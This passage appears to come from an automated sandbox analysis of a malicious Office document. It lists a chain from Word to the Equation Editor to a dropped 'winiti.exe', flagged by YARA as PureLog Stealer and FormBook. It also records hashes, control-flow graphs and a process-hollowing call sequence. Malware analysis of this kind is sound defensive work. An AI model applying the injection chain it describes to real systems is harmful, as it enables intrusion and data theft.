                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:3
                        Start time:07:40:19
                        Start date:26/07/2024
                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                        Imagebase:0x13f6c0000
                        File size:1'423'704 bytes
                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:07:40:26
                        Start date:26/07/2024
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543'304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:07:40:28
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Roaming\winiti.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                        Imagebase:0x1380000
                        File size:951'296 bytes
                        MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.414747610.0000000000590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.415607695.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:9
                        Start time:07:40:29
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Roaming\winiti.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                        Imagebase:0x1380000
                        File size:951'296 bytes
                        MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Code Analysis

                        Call Graph

                        • Entrypoint
                        • Decryption Function
                        • Executed
                        • Not Executed
                        • Show Help
                        callgraph 1 Error: Graph is empty

                        Module: Sheet1

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "Sheet1"

                        2

                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = False

                        8

                        Attribute VB_Customizable = True

                        Module: Sheet2

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "Sheet2"

                        2

                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = False

                        8

                        Attribute VB_Customizable = True

                        Module: Sheet3

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "Sheet3"

                        2

                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = False

                        8

                        Attribute VB_Customizable = True

                        Module: ThisWorkbook

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "ThisWorkbook"

                        2

                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = False

                        8

                        Attribute VB_Customizable = True

                        Reset < >

                          Execution Graph

                          Execution Coverage:18.1%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:138
                          Total number of Limit Nodes:2
                          execution_graph 6729 bd4068 6730 bd40ca 6729->6730 6731 bd4072 6729->6731 6734 bd4988 6731->6734 6754 bd4978 6731->6754 6735 bd49a2 6734->6735 6775 bd5121 6735->6775 6780 bd51c4 6735->6780 6785 bd5304 6735->6785 6790 bd518a 6735->6790 6795 bd534b 6735->6795 6799 bd524f 6735->6799 6804 bd55ad 6735->6804 6808 bd51b2 6735->6808 6813 bd5310 6735->6813 6818 bd5157 6735->6818 6823 bd54f5 6735->6823 6827 bd4f7e 6735->6827 6832 bd545f 6735->6832 6837 bd4e5c 6735->6837 6845 bd4ebc 6735->6845 6850 bd4f1d 6735->6850 6857 bd4ee0 6735->6857 6736 bd49c6 6736->6730 6755 bd4933 6754->6755 6756 bd497b 6754->6756 6755->6730 6756->6755 6758 bd4f1d 4 API calls 6756->6758 6759 bd4ebc 2 API calls 6756->6759 6760 bd4e5c 4 API calls 6756->6760 6761 bd545f 2 API calls 6756->6761 6762 bd4f7e 2 API calls 6756->6762 6763 bd54f5 2 API calls 6756->6763 6764 bd5157 2 API calls 6756->6764 6765 bd5310 2 API calls 6756->6765 6766 bd51b2 2 API calls 6756->6766 6767 bd55ad 2 API calls 6756->6767 6768 bd524f 2 API calls 6756->6768 6769 bd534b 2 API calls 6756->6769 6770 bd518a 2 API calls 6756->6770 6771 bd5304 2 API calls 6756->6771 6772 bd51c4 2 API calls 6756->6772 6773 bd5121 2 API calls 6756->6773 6774 bd4ee0 2 API calls 6756->6774 6757 bd49c6 6757->6730 6758->6757 6759->6757 6760->6757 6761->6757 6762->6757 6763->6757 6764->6757 6765->6757 6766->6757 6767->6757 6768->6757 6769->6757 6770->6757 6771->6757 6772->6757 6773->6757 6774->6757 6776 bd512f 6775->6776 6862 bd3408 6776->6862 6866 bd3400 6776->6866 6777 bd51f3 6777->6777 6781 bd51de 6780->6781 6783 bd3408 ResumeThread 6781->6783 6784 bd3400 ResumeThread 6781->6784 6782 bd51f3 6782->6782 6783->6782 6784->6782 6787 bd4ec8 6785->6787 6786 bd551a 6786->6736 6787->6736 6787->6786 6870 bd38aa 6787->6870 6874 bd38b0 6787->6874 6792 bd4ec8 6790->6792 6791 bd551a 6791->6736 6792->6736 6792->6790 6792->6791 6793 bd38aa ReadProcessMemory 6792->6793 6794 bd38b0 ReadProcessMemory 6792->6794 6793->6791 6794->6791 6878 bd34f8 6795->6878 6882 bd34f2 6795->6882 6796 bd5365 6801 bd4ec8 6799->6801 6800 bd551a 6800->6736 6801->6736 6801->6800 6802 bd38aa ReadProcessMemory 6801->6802 6803 bd38b0 ReadProcessMemory 6801->6803 6802->6800 6803->6800 6805 bd56a5 6804->6805 6886 bd3748 6805->6886 6890 bd3750 6805->6890 6809 bd51b6 6808->6809 6811 bd38aa ReadProcessMemory 6809->6811 6812 bd38b0 ReadProcessMemory 6809->6812 6810 bd551a 6810->6736 6811->6810 6812->6810 6814 bd4ec8 6813->6814 6814->6736 6815 bd551a 6814->6815 6816 bd38aa ReadProcessMemory 6814->6816 6817 bd38b0 ReadProcessMemory 6814->6817 6815->6736 6816->6815 6817->6815 6820 bd4ec8 6818->6820 6819 bd551a 6819->6736 6820->6736 6820->6819 6821 bd38aa ReadProcessMemory 6820->6821 6822 bd38b0 ReadProcessMemory 6820->6822 6821->6819 6822->6819 6824 bd551a 6823->6824 6825 bd38aa ReadProcessMemory 6823->6825 6826 bd38b0 ReadProcessMemory 6823->6826 6824->6736 6825->6824 6826->6824 6828 bd4fa1 6827->6828 6830 bd3748 WriteProcessMemory 6828->6830 6831 bd3750 WriteProcessMemory 6828->6831 6829 bd53d7 6830->6829 6831->6829 6833 bd5465 6832->6833 6835 bd3748 WriteProcessMemory 6833->6835 6836 bd3750 WriteProcessMemory 6833->6836 6834 bd5631 6835->6834 6836->6834 6838 bd4e62 6837->6838 6894 bd3adc 6838->6894 6898 bd3ae8 6838->6898 6839 bd551a 6839->6736 6840 bd4e96 6840->6736 6840->6839 6841 bd38aa ReadProcessMemory 6840->6841 6842 bd38b0 ReadProcessMemory 6840->6842 6841->6839 6842->6839 6846 bd4ec8 6845->6846 6846->6736 6847 bd551a 6846->6847 6848 bd38aa ReadProcessMemory 6846->6848 6849 bd38b0 ReadProcessMemory 6846->6849 6847->6736 6848->6847 6849->6847 6902 bd3628 6850->6902 6906 bd3622 6850->6906 6851 bd551a 6851->6736 6852 bd4ec8 6852->6736 6852->6851 6855 bd38aa ReadProcessMemory 6852->6855 6856 bd38b0 ReadProcessMemory 6852->6856 6855->6851 6856->6851 6858 bd4ec8 6857->6858 6858->6736 6859 bd551a 6858->6859 6860 bd38aa ReadProcessMemory 6858->6860 6861 bd38b0 ReadProcessMemory 6858->6861 6859->6736 6860->6859 6861->6859 6863 bd344c ResumeThread 6862->6863 6865 bd349e 6863->6865 6865->6777 6867 bd344c ResumeThread 6866->6867 6869 bd349e 6867->6869 6869->6777 6871 bd38fc ReadProcessMemory 6870->6871 6873 bd397a 6871->6873 6873->6786 6875 bd38fc ReadProcessMemory 6874->6875 6877 bd397a 6875->6877 6877->6786 6879 bd3541 Wow64SetThreadContext 6878->6879 6881 bd35bf 6879->6881 6881->6796 6883 bd3541 Wow64SetThreadContext 6882->6883 6885 bd35bf 6883->6885 6885->6796 6887 bd379c WriteProcessMemory 6886->6887 6889 bd383b 6887->6889 6889->6805 6891 bd379c WriteProcessMemory 6890->6891 6893 bd383b 6891->6893 6893->6805 6895 bd3b6f CreateProcessA 6894->6895 6897 bd3dcd 6895->6897 6899 bd3b6f CreateProcessA 6898->6899 6901 bd3dcd 6899->6901 6903 bd366c VirtualAllocEx 6902->6903 6905 bd36ea 6903->6905 6905->6852 6907 bd366c VirtualAllocEx 6906->6907 6909 bd36ea 6907->6909 6909->6852

                          Executed Functions

                          Function 002C3D98 Relevance: 8.2, Strings: 6, Instructions: 741COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 2c3d98-2c3dca 2 2c42fb-2c4319 0->2 3 2c3dd0-2c3e64 0->3 6 2c4714-2c4720 2->6 28 2c3e66-2c3e6a 3->28 29 2c3e70-2c3ec7 3->29 8 2c4726 6->8 9 2c4327-2c4333 6->9 12 2c4738-2c473f 8->12 10 2c4728-2c472d 9->10 11 2c4339-2c43b9 9->11 10->12 30 2c43bb-2c43c1 11->30 31 2c43d1-2c43ea 11->31 28->29 54 2c3ecd-2c3ed5 29->54 55 2c4245-2c4269 29->55 32 2c43c5-2c43c7 30->32 33 2c43c3 30->33 37 2c43ec-2c4415 31->37 38 2c441a-2c4458 31->38 32->31 33->31 48 2c4711 37->48 51 2c447d-2c448a 38->51 52 2c445a-2c447b 38->52 48->6 60 2c4491-2c4497 51->60 52->60 58 2c3edc-2c3ee4 54->58 59 2c3ed7-2c3edb 54->59 65 2c42ed-2c42f8 55->65 61 2c3ee9-2c3f0b 58->61 62 2c3ee6 58->62 59->58 66 2c4499-2c44b4 60->66 67 2c44b6-2c4508 60->67 71 2c3f0d 61->71 72 2c3f10-2c3f16 61->72 62->61 65->2 66->67 101 2c450e-2c4513 67->101 102 2c4623-2c4662 67->102 71->72 75 2c3f1c-2c3f36 72->75 76 2c41c5-2c41d0 72->76 78 2c3f38-2c3f3c 75->78 79 2c3f7b-2c3f84 75->79 80 2c41d5-2c420c call 2c0b74 76->80 81 2c41d2 76->81 78->79 85 2c3f3e-2c3f49 78->85 83 2c42e8 79->83 84 2c3f8a-2c3f9a 79->84 115 2c420e-2c4238 80->115 116 2c423a-2c423f 80->116 81->80 83->65 84->83 86 2c3fa0-2c3fb1 84->86 87 2c3f4f 85->87 88 2c3fd7-2c4084 85->88 86->83 91 2c3fb7-2c3fc7 86->91 92 2c3f52-2c3f54 87->92 103 2c4094-2c415c 88->103 104 2c4086 88->104 91->83 94 2c3fcd-2c3fd4 91->94 96 2c3f5a-2c3f65 92->96 97 2c3f56 92->97 94->88 96->83 100 2c3f6b-2c3f77 96->100 97->96 100->92 105 2c3f79 100->105 108 2c451d-2c4520 101->108 125 2c467e-2c468d 102->125 126 2c4664-2c467c 102->126 122 2c426e-2c4280 103->122 123 2c4162-2c4166 103->123 104->103 107 2c4088-2c408e 104->107 105->88 107->103 112 2c45eb-2c4613 108->112 113 2c4526 108->113 124 2c4619-2c461d 112->124 117 2c452d-2c4559 113->117 118 2c45bd-2c45e9 113->118 119 2c455e-2c458a 113->119 120 2c458f-2c45bb 113->120 115->116 116->55 117->124 118->124 119->124 120->124 122->83 127 2c4282-2c429f 122->127 123->122 128 2c416c-2c417b 123->128 124->102 124->108 132 2c4696-2c46f8 125->132 126->132 127->83 135 2c42a1-2c42bd 127->135 136 2c417d 128->136 137 2c41bb-2c41bf 128->137 148 2c4703-2c470a 132->148 135->83 138 2c42bf-2c42dd 135->138 139 2c4183-2c4185 136->139 137->75 137->76 138->83 142 2c42df 138->142 143 2c418f-2c41ab 139->143 144 2c4187-2c418b 139->144 142->83 143->83 145 2c41b1-2c41b9 143->145 144->143 145->137 145->139 148->48
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p$TJp$Tep$pp$sk?$xbp
                          • API String ID: 0-448541618
                          • Opcode ID: 3d5286a96d690567781f172c3761532fe16a6b9b01357dc1e8ed21bdbc8917a5
                          • Instruction ID: 25338b93bf8acd53bf598758f7d235579d4da83637d4052122b940227aeb7041
                          • Opcode Fuzzy Hash: 3d5286a96d690567781f172c3761532fe16a6b9b01357dc1e8ed21bdbc8917a5
                          • Instruction Fuzzy Hash: 8C624775A10614DFDB14DFA8C894F59BBB2FF89304F1682A8E509AB266CB31ED51CF40
                          Function 002C04C8 Relevance: 2.9, Strings: 1, Instructions: 1698COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 190 2c04c8-2c11a3 193 2c11aa-2c1740 call 2c0788 * 2 call 2c0798 * 2 call 2c07a8 * 2 call 2c07b8 call 2c07a8 * 2 call 2c0788 call 2c07c8 call 2c07a8 call 2c07d8 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d68 call 2c07e8 call 2c07f8 call 2c0808 190->193 194 2c11a5 190->194 282 2c1909-2c191c 193->282 194->193 283 2c1745-2c174c 282->283 284 2c1922-2c2148 call 2c0818 call 2c0828 call 2c0d68 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d68 call 2c07e8 call 2c07f8 call 2c0808 call 2c0d78 call 2c0818 call 2c0828 call 2c0d68 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d88 call 2c0d68 call 2c0d98 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d88 call 2c0d68 call 2c0d98 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0da8 282->284 285 2c1787-2c1798 283->285 407 2c214f-2c221f call 2c0db8 284->407 408 2c214a 284->408 286 2c174e-2c177b 285->286 287 2c179a-2c17cf 285->287 292 2c177d-2c1782 286->292 293 2c1783-2c1784 286->293 290 2c17d6-2c17fd 287->290 291 2c17d1 287->291 295 2c17ff 290->295 296 2c1804-2c1848 290->296 291->290 292->293 293->285 295->296 298 2c184f-2c1890 296->298 299 2c184a 296->299 301 2c1897-2c18b8 298->301 302 2c1892 298->302 299->298 303 2c18f2-2c1903 301->303 302->301 304 2c18ba-2c18e7 303->304 305 2c1905-2c1906 303->305 308 2c18ee-2c18ef 304->308 309 2c18e9-2c18ed 304->309 305->282 308->303 309->308 416 2c222a-2c2db0 call 2c0d68 call 2c0dc8 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d88 call 2c0d98 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d88 call 2c0d98 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c07f8 call 2c0808 call 2c0818 call 2c0dd8 call 2c0de8 call 2c0df8 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d88 call 2c0d98 call 2c0e08 call 2c0e18 call 2c0e28 call 2c0e38 * 12 call 2c0808 call 2c0e48 call 2c0e58 call 2c0e68 407->416 408->407
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: Ppp
                          • API String ID: 0-99483665
                          • Opcode ID: 173eda1ebd07080c7cbc0e061f20edafa37ea84f86fde2431c5e0a5c450dc42c
                          • Instruction ID: 37444c3e5ea57e52e4f6fda67891a2319fd8466fc58ad046b9db05bcec92d04d
                          • Opcode Fuzzy Hash: 173eda1ebd07080c7cbc0e061f20edafa37ea84f86fde2431c5e0a5c450dc42c
                          • Instruction Fuzzy Hash: 9403B434A5121ACFCB64DB64C894BE9B7B2FF89304F5146E9E4096B361DB31AE85CF40
                          Function 002C1168 Relevance: 2.8, Strings: 1, Instructions: 1546COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 575 2c1168-2c1175 576 2c118e-2c11a3 575->576 577 2c1177-2c118b 575->577 578 2c11aa-2c1516 call 2c0788 * 2 call 2c0798 * 2 call 2c07a8 * 2 call 2c07b8 call 2c07a8 * 2 call 2c0788 call 2c07c8 call 2c07a8 call 2c07d8 call 2c07e8 576->578 579 2c11a5 576->579 577->576 640 2c1520-2c1534 call 2c07f8 578->640 579->578 642 2c1539-2c1740 call 2c0808 call 2c0818 call 2c0828 call 2c0d68 call 2c07e8 call 2c07f8 call 2c0808 640->642 667 2c1909-2c191c 642->667 668 2c1745-2c174c 667->668 669 2c1922-2c20ff call 2c0818 call 2c0828 call 2c0d68 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d68 call 2c07e8 call 2c07f8 call 2c0808 call 2c0d78 call 2c0818 call 2c0828 call 2c0d68 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d88 call 2c0d68 call 2c0d98 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d88 call 2c0d68 call 2c0d98 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0da8 667->669 670 2c1787-2c1798 668->670 789 2c2105-2c2132 669->789 671 2c174e-2c177b 670->671 672 2c179a-2c17cf 670->672 677 2c177d-2c1782 671->677 678 2c1783-2c1784 671->678 675 2c17d6-2c17fd 672->675 676 2c17d1 672->676 680 2c17ff 675->680 681 2c1804-2c1848 675->681 676->675 677->678 678->670 680->681 683 2c184f-2c1890 681->683 684 2c184a 681->684 686 2c1897-2c18b8 683->686 687 2c1892 683->687 684->683 688 2c18f2-2c1903 686->688 687->686 689 2c18ba-2c18e7 688->689 690 2c1905-2c1906 688->690 693 2c18ee-2c18ef 689->693 694 2c18e9-2c18ed 689->694 690->667 693->688 694->693 791 2c2138-2c2148 789->791 792 2c214f-2c21f6 call 2c0db8 791->792 793 2c214a 791->793 800 2c2201-2c221f 792->800 793->792 801 2c222a-2c2db0 call 2c0d68 call 2c0dc8 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d88 call 2c0d98 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d88 call 2c0d98 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c07f8 call 2c0808 call 2c0818 call 2c0dd8 call 2c0de8 call 2c0df8 call 2c07e8 call 2c07f8 call 2c0808 call 2c0818 call 2c0828 call 2c0d88 call 2c0d98 call 2c0e08 call 2c0e18 call 2c0e28 call 2c0e38 * 12 call 2c0808 call 2c0e48 call 2c0e58 call 2c0e68 800->801
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: Ppp
                          • API String ID: 0-99483665
                          • Opcode ID: 179813d8763974584020b087c3cc8f9181e9d9dfa43d991c5715204b6f0e6c75
                          • Instruction ID: 1ce69628e431685dec018c669ebaeed841ac0d1c272151a31ef49da35a242f9b
                          • Opcode Fuzzy Hash: 179813d8763974584020b087c3cc8f9181e9d9dfa43d991c5715204b6f0e6c75
                          • Instruction Fuzzy Hash: 85F2B534A5121ACFCB64DB64C894BE9B7B1FF8A304F5146E9E4096B361DB31AE85CF40
                          Function 002C4B55 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 149 2c4b55-2c4bd6 158 2c4bee-2c4c41 149->158 159 2c4bd8-2c4bde 149->159 167 2c4c59-2c4c7a 158->167 168 2c4c43-2c4c49 158->168 160 2c4be0 159->160 161 2c4be2-2c4be4 159->161 160->158 161->158 185 2c4c7c call 2cab70 167->185 186 2c4c7c call 2cab80 167->186 169 2c4c4d-2c4c4f 168->169 170 2c4c4b 168->170 169->167 170->167 173 2c4c82-2c4cf7 187 2c4cf9 call 2cb2d8 173->187 188 2c4cf9 call 2cb2b0 173->188 189 2c4cf9 call 2cb3a0 173->189 182 2c4cff-2c4d23 185->173 186->173 187->182 188->182 189->182
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: $p$$p$$p$$p
                          • API String ID: 0-3121760203
                          • Opcode ID: 62568d65a2ffd36646869d1199952c8ab06eafc59f47052f8541752f17404d5b
                          • Instruction ID: 37c7ec4378e77757afce3a8a019b15b6d266fe3a7ea3dc12764284f3a0cf2b85
                          • Opcode Fuzzy Hash: 62568d65a2ffd36646869d1199952c8ab06eafc59f47052f8541752f17404d5b
                          • Instruction Fuzzy Hash: 47415F34B002008FD718AB74DC59B6E7BE2EFC8301F2880A9E506D73A9DE759D51CB91
                          Function 002CDBE8 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 960 2cdbe8-2cdc0b 961 2cdc0d 960->961 962 2cdc12-2cde01 call 2c0b74 call 2cdb90 960->962 961->962 980 2cdc5d-2cdc62 962->980 981 2cde07 962->981 982 2cdc68-2cdc69 980->982 983 2cdd15-2cdd35 980->983 982->983 985 2cddce-2cdde3 983->985 986 2cdd3b-2cdd3c call 2c0c38 983->986 996 2cdcef-2cdcf9 986->996
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: Tep$Tep
                          • API String ID: 0-347264811
                          • Opcode ID: 925d90c0ccec22add6190ac2c5d2414ea607779f72a1a838df0a36eb3fd0b5a3
                          • Instruction ID: 4a5f7c58e08b0d364034c66b3a65bbda6d1a17a2e3463207de062b4657adc172
                          • Opcode Fuzzy Hash: 925d90c0ccec22add6190ac2c5d2414ea607779f72a1a838df0a36eb3fd0b5a3
                          • Instruction Fuzzy Hash: CF61D374E14208CFDB08CFA9C884AEDFBB6BF89300F20912AD41AAB355D7745955CF50
                          Function 002C4980 Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 997 2c4980-2c49db call 2c4da0 1001 2c49e1-2c4a29 call 2c0b74 call 2c3980 call 2c0bac 997->1001 1011 2c4a2c-2c4a57 1001->1011 1014 2c4a7c-2c4a7e 1011->1014 1015 2c4a59-2c4a74 1011->1015 1014->1011 1016 2c4a80-2c4aef 1014->1016 1015->1014 1025 2c4b0f 1016->1025 1026 2c4af1-2c4b06 1016->1026 1026->1025
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: Tep$Tep
                          • API String ID: 0-347264811
                          • Opcode ID: f408e034621084e1d384c1fe8dd5843ff7918c1be365ff92365c137dc49dcfff
                          • Instruction ID: 14fb3492ca18b940e39214d12c252a306b7038568c1098828f5228f283b28b31
                          • Opcode Fuzzy Hash: f408e034621084e1d384c1fe8dd5843ff7918c1be365ff92365c137dc49dcfff
                          • Instruction Fuzzy Hash: FE41C030B111049FD715ABA8D96976F7AA7EBC8300F20406CE50AAB389CF789C068B91
                          Function 00BD3ADC Relevance: 1.8, APIs: 1, Instructions: 327processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1029 bd3adc-bd3b81 1031 bd3bca-bd3bf2 1029->1031 1032 bd3b83-bd3b9a 1029->1032 1036 bd3c38-bd3c8e 1031->1036 1037 bd3bf4-bd3c08 1031->1037 1032->1031 1035 bd3b9c-bd3ba1 1032->1035 1038 bd3bc4-bd3bc7 1035->1038 1039 bd3ba3-bd3bad 1035->1039 1046 bd3cd4-bd3dcb CreateProcessA 1036->1046 1047 bd3c90-bd3ca4 1036->1047 1037->1036 1044 bd3c0a-bd3c0f 1037->1044 1038->1031 1041 bd3baf 1039->1041 1042 bd3bb1-bd3bc0 1039->1042 1041->1042 1042->1042 1045 bd3bc2 1042->1045 1048 bd3c11-bd3c1b 1044->1048 1049 bd3c32-bd3c35 1044->1049 1045->1038 1065 bd3dcd-bd3dd3 1046->1065 1066 bd3dd4-bd3eb9 1046->1066 1047->1046 1055 bd3ca6-bd3cab 1047->1055 1050 bd3c1d 1048->1050 1051 bd3c1f-bd3c2e 1048->1051 1049->1036 1050->1051 1051->1051 1054 bd3c30 1051->1054 1054->1049 1057 bd3cad-bd3cb7 1055->1057 1058 bd3cce-bd3cd1 1055->1058 1059 bd3cb9 1057->1059 1060 bd3cbb-bd3cca 1057->1060 1058->1046 1059->1060 1060->1060 1061 bd3ccc 1060->1061 1061->1058 1065->1066 1078 bd3ec9-bd3ecd 1066->1078 1079 bd3ebb-bd3ebf 1066->1079 1081 bd3edd-bd3ee1 1078->1081 1082 bd3ecf-bd3ed3 1078->1082 1079->1078 1080 bd3ec1 1079->1080 1080->1078 1084 bd3ef1-bd3ef5 1081->1084 1085 bd3ee3-bd3ee7 1081->1085 1082->1081 1083 bd3ed5 1082->1083 1083->1081 1086 bd3f2b-bd3f36 1084->1086 1087 bd3ef7-bd3f20 1084->1087 1085->1084 1088 bd3ee9 1085->1088 1092 bd3f37 1086->1092 1087->1086 1088->1084 1092->1092
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BD3DAF
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: d96562d04ace6f61177b2152f982a708773959c281fa1a92b79fe3450d63701e
                          • Instruction ID: b4990eb26e114d93fe9ea27131880549f15b91b2af0eee5719f463912b388985
                          • Opcode Fuzzy Hash: d96562d04ace6f61177b2152f982a708773959c281fa1a92b79fe3450d63701e
                          • Instruction Fuzzy Hash: 13C10571D002598FDB25CFA8C841BEEBBF1FB09300F0495AAD819B7251EB749A85CF95
